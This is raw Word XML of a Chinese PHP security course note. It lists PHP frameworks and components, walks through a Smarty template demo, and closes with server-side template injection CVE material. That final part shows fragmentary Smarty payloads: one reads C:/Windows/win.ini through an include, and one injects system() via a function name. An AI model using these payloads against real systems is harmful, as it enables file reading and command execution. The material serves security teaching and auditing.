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2EDAC" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web开发-PHP应用&amp;组件框架&amp;前端模版渲染&amp;三方插件&amp;富文本编辑器&amp;CVE审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E4A624" w14:textId="0EA83060" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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7FEBA0C0" wp14:editId="08DC835D">
            <wp:extent cx="5274310" cy="1903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697EE" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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超级全局变量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数据库通讯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身份验证技术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Cookie&amp;Session&amp;Token</w:t>
      </w:r>
      <w:proofErr w:type="spell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弱类型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脆弱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函数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数据类型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开发组件集合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模版引擎渲染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第三方编辑器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具体点：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1875"/>
        <w:gridCol w:w="7620"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000686" w14:paraId="5CF43333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CBCDD1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BF7230" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686">
            <w:pPr>
              <w:pStyle w:val="paragraph"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center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类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBCDD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8C3E0F" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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组件/框架</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBCDD1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575C7" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="3FF9FA58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5D188D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[Web框架]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8397B6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Laravel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600DB0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现代化、功能全面的框架，适合大多数Web应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="6DEC4C2C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05E0E6" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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1DD14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Symfony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DB161E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高度模块化、功能强大的框架，适合复杂应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="2AFCF4DD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331492" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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8DDC2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CodeIgniter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504893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轻量级框架，适合快速开发。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="137BF7F4" w14:textId="77777777" w:rsidTr="00000686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A845F" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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C5124B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Zend Framework (Laminas)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BA2A8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企业级框架，适合大规模应用，具有高扩展性和性能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="4CD3BB68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3F4DB" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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352549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Yii</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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E45668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高性能框架，适合快速开发和大规模应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="32FDB246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C966A3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[数据库组件]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35D98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Doctrine ORM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DA7D17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强大的ORM工具，支持复杂的查询和映射。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="421B8B21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ACF5E1" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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19966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Eloquent ORM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469DAB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Laravel内置ORM，简化数据库操作。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="66B6E6C1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B53AF2" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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A3141C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PDO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472081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PHP的数据库抽象层，支持多种数据库引擎。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="68EB892C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BF578D" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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8E831A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RedBeanPHP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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87635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轻量级ORM，自动创建和管理数据库表。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="011BA01B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FA467C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[模板引擎]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ED34B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Twig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ACD2B2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灵活、现代的模板引擎，常用于Symfony项目。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="0373FC91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D9CA15" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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A554B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Blade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6D848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Laravel内置模板引擎，支持模板继承和控制结构。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="3431D7B4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ACFD90" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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8845F4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Smarty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F09284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经典模板引擎，适合中大型项目。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="4F598ADD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2CD0B4" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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4F9210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Mustache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A32F47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轻量级跨语言模板引擎，支持PHP、JavaScript等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="0883C98C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31127B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[路由组件]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9EDC7D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FastRoute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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7D7F27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高性能PHP路由库，适用于小型应用和API。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="79C84BDF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D7B32F" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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01FC2C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AltoRouter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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34059E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轻量级路由库，适合小型项目，易于配置。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="2F207D82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13A32C" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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679DE2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Symfony Routing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20CB35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Symfony的路由组件，适合复杂应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="66E75E4C" w14:textId="77777777" w:rsidTr="00000686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7BA21F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[认证与授权]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073415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OAuth2 Server PHP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660C00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实现OAuth2协议的PHP库，适用于API认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="76B35FAF" w14:textId="77777777" w:rsidTr="00000686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198504" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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10CA83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JWT (JSON Web Token)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35D82F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轻量级身份验证方案，适合API认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="18EADA48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AA9E5" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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0490A1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PHP-Auth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2D538B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简单的用户认证库，适用于中小型Web应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="0F199A44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C4CD62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[支付集成]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07D82F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Stripe PHP SDK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D43AB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集成Stripe支付功能，支持信用卡支付、订阅等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="39CEAC52" w14:textId="77777777" w:rsidTr="00000686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3FDD72" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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1F5358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PayPal SDK for PHP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CD0893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集成PayPal支付功能，支持支付、退款等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="2078B224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B59E9E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[邮件发送]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92E6DE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PHPMailer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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AFB9D2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功能强大的邮件发送库，支持SMTP、POP3等协议。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="0DA81DA6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6C480" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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BD4FE6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SwiftMailer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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EE586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另一款流行的邮件发送库，支持多种邮件功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="70AF850D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86263A" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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752609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Mailgun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 xml:space="preserve"> PHP SDK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40EC21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Mailgun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的官方SDK，用于通过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Mailgun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 xml:space="preserve"> API发送邮件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="7CCFC803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90467A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[文件管理]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EC6872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Flysystem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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6FCB1D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文件存储抽象库，支持多种存储方式（如本地、Amazon S3、FTP等）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="1DF26E2C" w14:textId="77777777" w:rsidTr="00000686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908EF" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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189DC2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Symfony Filesystem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68C24B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Symfony的文件系统组件，提供简单的文件操作API。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="58B77194" w14:textId="77777777" w:rsidTr="00000686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7946ED" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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A2F419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Intervention Image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B429F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图片处理库，支持裁剪、调整大小、水印等功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="77F48860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8D0DDD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[缓存与性能]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599BA0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Redis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B3EF6A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内存数据存储系统，用于缓存、消息队列等，提升性能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="6A2531CD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20C707" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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056FF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Memcached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964D6D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内存缓存系统，适用于高并发应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="3E788B43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F47232" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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CDB125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Symfony Cache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11AF23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Symfony缓存组件，支持多种缓存后端。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="0DD3E798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835000" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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0CE7E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Laravel Cache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1E7DFB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Laravel内置缓存系统，提升Web应用性能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="5AA595DD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686ACB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[日志管理]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5A68A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Monolog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62F032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强大的日志库，支持多种日志渠道（如文件、数据库、邮件等）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="1E0C61C8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73281D" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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D6986E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Log4PHP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A2A121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Apache Log4j的PHP实现，适用于复杂日志功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="1D6135BB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0FF39F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[任务队列]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1FCEA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Laravel Queue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509B43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Laravel内置队列系统，支持延迟任务、异步处理。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="666333CC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56F8FD" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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9AC246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Resque</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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BD265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基于Redis的任务队列库，适用于异步任务处理。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="04AF497C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7016A" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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8DECFE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RabbitMQ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98991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开源消息代理服务，用于任务调度和消息传递。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="488C7680" w14:textId="77777777" w:rsidTr="00000686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2CA4D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[WebSocket与实时通信]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7C4EA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Ratchet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8A0FCA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用于实现WebSocket服务，适合在线聊天、实时通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="111557B5" w14:textId="77777777" w:rsidTr="00000686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AD63B" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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E96515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Swoole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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D7B3B0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高性能协程框架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，支持WebSocket、TCP、UDP等协议，适用于高并发实时应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="33AC015B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D27C76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[测试与调试]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FDC688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PHPUnit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B63F6C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PHP标准单元测试框架，广泛用于自动化测试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="29FA9C02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BCC1D8" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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6567BE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Xdebug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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49A98F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PHP调试工具，支持堆栈跟踪、性能分析、断点调试等功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="630432F4" w14:textId="77777777" w:rsidTr="00000686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3FB007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[富文本编辑器]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50B1F8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KindEditor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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C83E1F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一个轻量级且功能丰富的富文本编辑器，支持图片上传、插入视频等，适用于PHP开发的Web项目。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="10B91D08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23B90C" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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7EC53E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TinyMCE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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61CB18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开源的富文本编辑器，支持多种格式的文本编辑，插件丰富，易于集成。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="13AFCA7E" w14:textId="77777777" w:rsidTr="00000686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9B700F" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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26B31B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CKEditor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B213D5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高度可定制的富文本编辑器，支持图片、文件上传、富文本格式化等功能，广泛用于Web项目中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="39DE517E" w14:textId="77777777" w:rsidTr="00000686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F7FDC4" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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CF38AC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Froala</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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Editor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BDEA9D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轻量级、现代的富文本编辑器，支持图像处理、视频嵌入、内嵌富文本等，适合复杂的Web应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="22E7F9F8" w14:textId="77777777" w:rsidTr="00000686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E91B0D" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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F981E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Quill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3B7AEF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开源富文本编辑器，功能强大、轻量级，支持图片、视频、格式设置等功能，适合单页面应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="6203B234" w14:textId="77777777" w:rsidTr="00000686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6D5C16" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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28C49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Summernote</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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7CB3A0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基于jQuery的轻量级富文本编辑器，支持文本格式化、图片上传等，适合中小型Web项目。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="1F29CA9E" w14:textId="77777777" w:rsidTr="00000686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D84DC1" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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BCF48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Trumbowyg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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BC0C1E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轻量级的富文本编辑器，功能简单但支持基本的文本编辑、图片上传、视频插入等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="16AE8FC0" w14:textId="77777777" w:rsidTr="00000686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4EE292" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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56C657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Redactor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3E680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现代的富文本编辑器，功能丰富，支持图片、文件上传等，适合多种Web应用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="3A700441" w14:textId="77777777" w:rsidTr="00000686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CD64A8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[图片上传组件]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9B6BCD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Dropzone.js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839176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支持拖拽上传和多文件上传的JavaScript库，易于与PHP集成，常用于图片、文件上传功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="6E039ACC" w14:textId="77777777" w:rsidTr="00000686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6007C7" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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75926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FilePond</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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3EA62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高度可定制的文件上传库，支持图片预览、验证、上传进度等，适合需要精美上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传功能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的Web项目。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="5A067D7C" w14:textId="77777777" w:rsidTr="00000686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568537" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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414141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Fine Uploader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71563F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支持多种文件上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传方式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的组件，支持多文件上传、拖拽上传，支持PHP处理后台。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="42AE9333" w14:textId="77777777" w:rsidTr="00000686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08ECA4" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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6B2D50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Plupload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B638D2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支持多种文件上传方式（包括HTML5和Flash），可以与PHP后台集成，广泛用于Web应用中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="57BF0BBA" w14:textId="77777777" w:rsidTr="00000686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51ED3C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[图片处理组件]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06EB3D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ImageMagick</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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7B7832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强大的图像处理库，支持图像格式转换、剪裁、旋转、加水印等多种功能，适用于PHP处理图像。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="462A3D3F" w14:textId="77777777" w:rsidTr="00000686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31B842" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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76A614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GD Library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CE0889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PHP内置图像处理库，支持图像创建、缩放、裁剪、色调调整等功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000686" w14:paraId="484D5B2C" w14:textId="77777777" w:rsidTr="00000686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CBCDD1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7C6CAE" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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CBCDD1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24467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Intervention Image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CBCDD1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E6DA31" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686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PHP图像处理库，支持裁剪、缩放、加水印等，易于与Laravel集成。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AAF8ADD" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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1B6F1EFF" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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WEB开发-原生PHP-超级全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104E6E5" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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WEB开发-原生PHP-代码审计案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041A92E5" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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WEB开发-原生PHP-通讯数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A821B69" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie&amp;Session&amp;Token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C6231CF" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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WEB开发-身份验证-代码审计案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DA18D" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>弱类型</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&amp;函数-特性安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CB5F68" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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WEB开发-数据对比-代码审计案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22181A09" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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WEB开发-Smarty模版&amp;插件编辑器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB8B7C" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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WEB开发-模版&amp;插件-代码审计案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12E112" w14:textId="77777777" w:rsidR="00000686" w:rsidRDefault="00000686" w:rsidP="00000686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990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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、模版引擎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在开始介绍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Smarty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之前先了解一下模板引擎，模板引擎是为了让前端界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html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与程序代码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分离而产生的一种解决方案，简单来说就是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文件里再也不用写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代码了。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Smarty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的原理是变量替换原则，我们只需在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文件写好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Smarty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的标签即可，例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{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name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，然后调用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Smarty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的方法传递变量参数即可。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模版使用案例：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模版框架：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Smarty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Twig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codeeval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python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模版框架：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jinja2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mako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tornad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Django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模版框架：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Thymeleaf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jade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velocity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FreeMarker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JavaScript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模版框架：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doT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Nunjucks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Pug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Marko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EJS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Dust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安全漏洞影响：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SSTI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Server Side Template Injection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，服务器端模板注入）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下载：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//github.com/smarty-php/smarty/releases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使用：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、创建一个文件夹，命名为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smarty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demo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。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、下载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Smarty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对应版本并解压缩到该文件夹中。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、创建一个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文件，命名为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index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，并在文件中添加以下代码：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&lt;?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//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引入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 Smarty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类文件</w:t>
      </w:r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require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'smarty-demo/libs/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Smarty.class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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//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创建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 Smarty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实例</w:t>
      </w:r>
      <w:r>
        <w:br/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$smarty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new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Smarty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//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设置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 Smarty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相关属性</w:t>
      </w:r>
      <w:r>
        <w:br/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$smarty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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>template_dir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'smarty-demo/templates/'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$smarty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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>compile_dir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'smarty-demo/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>templates_c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/'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$smarty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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cache_dir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'smarty-demo/cache/'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$smarty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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>config_dir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'smarty-demo/configs/'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//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赋值变量到模板中</w:t>
      </w:r>
      <w:r>
        <w:br/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$smarty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assign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'title'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欢迎使用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 xml:space="preserve"> Smarty'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//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显示模板</w:t>
      </w:r>
      <w:r>
        <w:br/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$smarty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display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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index.tpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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?&gt;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、创建一个名为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index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tpl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的模板文件，并将以下代码复制到上述点定义文件夹中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&lt;!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DOCTYPE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html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html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head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title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{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$title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title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head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body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h1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{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$title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h1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这是一个使用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Smarty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的例子。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lastRenderedPageBreak/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body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html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渲染文件受控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CVE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//xz.aliyun.com/t/11108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//www.cnblogs.com/magic-zero/p/8351974.html</w:t>
      </w:r>
      <w:r>
        <w:br/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*/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD4A68"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();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</w:t>
      </w:r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string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:{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include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file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'C:/Windows/win.ini'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string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:{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function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name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'x(){};system(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
